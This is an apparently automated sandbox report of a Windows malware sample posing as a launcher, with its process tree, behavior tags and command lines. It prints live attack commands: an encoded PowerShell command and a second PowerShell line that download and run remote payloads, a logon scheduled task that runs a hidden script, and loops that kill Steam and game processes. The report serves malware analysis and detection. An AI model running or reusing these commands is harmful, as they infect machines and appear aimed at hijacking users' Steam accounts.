PID 1796 wrote to memory of 3196	1796	efckgwgt.pjh0.exe	cmd.exe
PID 4124 wrote to memory of 2852	4124	efckgwgt.pjh3.exe	cmd.exe
PID 4124 wrote to memory of 2852	4124	efckgwgt.pjh3.exe	cmd.exe
PID 3196 wrote to memory of 1044	3196	cmd.exe	chcp.com
PID 3196 wrote to memory of 1044	3196	cmd.exe	chcp.com
PID 2852 wrote to memory of 1684	2852	cmd.exe	where.exe
PID 2852 wrote to memory of 1684	2852	cmd.exe	where.exe
PID 2852 wrote to memory of 4404	2852	cmd.exe	powershell.exe
PID 2852 wrote to memory of 4404	2852	cmd.exe	powershell.exe
PID 3196 wrote to memory of 4752	3196	cmd.exe	findstr.exe
PID 3196 wrote to memory of 4752	3196	cmd.exe	findstr.exe
PID 3196 wrote to memory of 4956	3196	cmd.exe	findstr.exe
PID 3196 wrote to memory of 4956	3196	cmd.exe	findstr.exe
PID 3196 wrote to memory of 3160	3196	cmd.exe	findstr.exe
PID 3196 wrote to memory of 3160	3196	cmd.exe	findstr.exe
PID 3196 wrote to memory of 1632	3196	cmd.exe	schtasks.exe
PID 3196 wrote to memory of 1632	3196	cmd.exe	schtasks.exe
PID 3196 wrote to memory of 4040	3196	cmd.exe	schtasks.exe
PID 3196 wrote to memory of 4040	3196	cmd.exe	schtasks.exe
PID 3196 wrote to memory of 548	3196	cmd.exe	cmd.exe
PID 3196 wrote to memory of 548	3196	cmd.exe	cmd.exe
PID 548 wrote to memory of 2568	548	cmd.exe	reg.exe
PID 548 wrote to memory of 2568	548	cmd.exe	reg.exe
PID 3196 wrote to memory of 4848	3196	cmd.exe	cmd.exe
PID 3196 wrote to memory of 4848	3196	cmd.exe	cmd.exe
PID 4848 wrote to memory of 3844	4848	cmd.exe	reg.exe
PID 4848 wrote to memory of 3844	4848	cmd.exe	reg.exe
PID 3196 wrote to memory of 3572	3196	cmd.exe	powershell.exe
PID 3196 wrote to memory of 3572	3196	cmd.exe	powershell.exe
PID 4444 wrote to memory of 4200	4444	efckgwgt.pjh1.exe	openwith.exe
PID 4444 wrote to memory of 4200	4444	efckgwgt.pjh1.exe	openwith.exe
PID 4444 wrote to memory of 4200	4444	efckgwgt.pjh1.exe	openwith.exe
PID 4444 wrote to memory of 4200	4444	efckgwgt.pjh1.exe	openwith.exe
PID 4444 wrote to memory of 4200	4444	efckgwgt.pjh1.exe	openwith.exe
PID 920 wrote to memory of 3448	920	cmd.exe	wusa.exe
PID 920 wrote to memory of 3448	920	cmd.exe	wusa.exe
PID 1628 wrote to memory of 628	1628	efckgwgt.pjh2.exe	dialer.exe
PID 1628 wrote to memory of 628	1628	efckgwgt.pjh2.exe	dialer.exe
PID 1628 wrote to memory of 628	1628	efckgwgt.pjh2.exe	dialer.exe
PID 1628 wrote to memory of 628	1628	efckgwgt.pjh2.exe	dialer.exe
PID 1628 wrote to memory of 628	1628	efckgwgt.pjh2.exe	dialer.exe
PID 1628 wrote to memory of 628	1628	efckgwgt.pjh2.exe	dialer.exe
PID 1628 wrote to memory of 628	1628	efckgwgt.pjh2.exe	dialer.exe
PID 628 wrote to memory of 612	628	dialer.exe	winlogon.exe
PID 628 wrote to memory of 672	628	dialer.exe	lsass.exe
PID 628 wrote to memory of 956	628	dialer.exe	svchost.exe
PID 628 wrote to memory of 316	628	dialer.exe	dwm.exe
PID 628 wrote to memory of 728	628	dialer.exe	svchost.exe
PID 628 wrote to memory of 1056	628	dialer.exe	svchost.exe
PID 628 wrote to memory of 1128	628	dialer.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:316

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1128

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1144

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1484

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
- Modifies registry class
PID:2700

C:\Windows\SysWOW64\openwith.exe
"C:\Windows\system32\openwith.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1948

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3024

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3364

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
PID:3416

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672

C:\Users\Admin\AppData\Roaming\efckgwgt.pjh0.exe
"C:\Users\Admin\AppData\Roaming\efckgwgt.pjh0.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E1D4.tmp\E1D5.tmp\E1D6.bat C:\Users\Admin\AppData\Roaming\efckgwgt.pjh0.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:3196

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3804

C:\Windows\system32\chcp.com
chcp 1251
6⤵
PID:1044

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:4752

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:4956

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:3160

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
6⤵
PID:1632

C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
6⤵
- Scheduled Task/Job: Scheduled Task
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
- Suspicious use of WriteProcessMemory
PID:548

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
7⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
7⤵
PID:3844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5488

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
6⤵
PID:5548

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
6⤵
- Kills process with taskkill
PID:5660

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:5768

C:\Windows\system32\find.exe
find /i "dota2.exe"
6⤵
PID:5832

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
6⤵
- Kills process with taskkill
PID:5936

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:5212

C:\Windows\system32\find.exe
find /i "cs2.exe"
6⤵
PID:396

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
6⤵
- Kills process with taskkill
PID:3988

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:4396

C:\Windows\system32\find.exe
find /i "RustClient.exe"
6⤵
PID:6100

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
6⤵
- Kills process with taskkill
PID:3800

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:3156

C:\Windows\system32\find.exe
find /i "GTA5.exe"
6⤵
PID:5500

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
6⤵
- Kills process with taskkill
PID:3456

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:5208

C:\Windows\system32\find.exe
find /i "TslGame.exe"
6⤵
PID:5724

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
6⤵
- Kills process with taskkill
PID:5376

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:3868

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
6⤵
PID:548

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
6⤵
- Kills process with taskkill
PID:3392

C:\Windows\system32\timeout.exe
timeout /t 3
6⤵
- Delays execution with timeout.exe
PID:5204

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:5580

C:\Windows\system32\find.exe
find /i "steam.exe"
6⤵
PID:5528

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
6⤵
- Kills process with taskkill
PID:5708

C:\Windows\system32\timeout.exe
timeout /t 3
6⤵
- Delays execution with timeout.exe
PID:5912

C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
6⤵
PID:2696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5928

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:452

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4500

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2108

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4396

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5460

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2020

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1908

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5752

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5884

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5888

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3696

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1688

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:512

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4040

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2756

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2432

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6136

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2252

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4384

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2380

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1952

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5928

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:3248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1400

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1920

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5936

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:6076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5532

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2472

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:512

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2080

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2220

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:224

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1920

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1628

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4832

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1240

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5040

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1428

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:3832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5912

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:716

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4488

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5888

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:6120

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2452

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6128

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1328

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5704

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5368

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1772

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4732

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3652

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5912

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2040

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5228

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5972

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2084

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1588

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3968

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1152

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5864

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3896

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2756

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:3528

C:\Windows\system32\cmd.exe
